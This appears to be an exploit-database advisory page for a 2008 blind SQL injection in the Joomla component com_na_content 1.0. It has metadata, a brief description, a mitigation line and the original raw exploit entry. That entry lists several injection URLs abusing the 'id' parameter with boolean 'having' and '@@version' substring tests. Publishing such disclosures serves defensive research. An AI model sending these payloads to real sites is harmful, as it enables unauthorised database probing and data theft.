header-logo
Suggest Exploit
vendor:
Joomla Component com_na_content
by:
xoron
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Joomla Component com_na_content
Affected Version From: 1
Affected Version To: 1
Patch Exists: N/A
Related CWE: N/A
CPE: a:joomla:joomla:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component com_na_content 1.0 Blind SQL Injection Vuln

A Blind SQL Injection vulnerability exists in Joomla Component com_na_content 1.0. An attacker can exploit this vulnerability by sending specially crafted requests to the vulnerable application. The vulnerable parameter is ‘id’ which is passed as a GET parameter in the request. An attacker can inject malicious SQL queries in the ‘id’ parameter and execute them in the backend database. This can be done by sending requests like /index.php?option=com_na_content&task=view&id=1 having 1=0 or /index.php?option=com_na_content&task=view&id=1 and substring(@@version,1,1)=4.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

Joomla Component com_na_content 1.0 Blind SQL Injection Vuln

Author: xoron

Exploit: /index.php?option=com_na_content&task=view&id=1 having 1=0
            /index.php?option=com_na_content&task=view&id=1 having 1=1
or

            /index.php?option=com_na_content&task=view&id=1 and substring(@@version,1,1)=4
            /index.php?option=com_na_content&task=view&id=1 and substring(@@version,1,1)=5

!! You can use this for inj.
!! Thans for Ozan!

# milw0rm.com [2008-12-29]

Navigation

Suggest Exploit

Services By CQR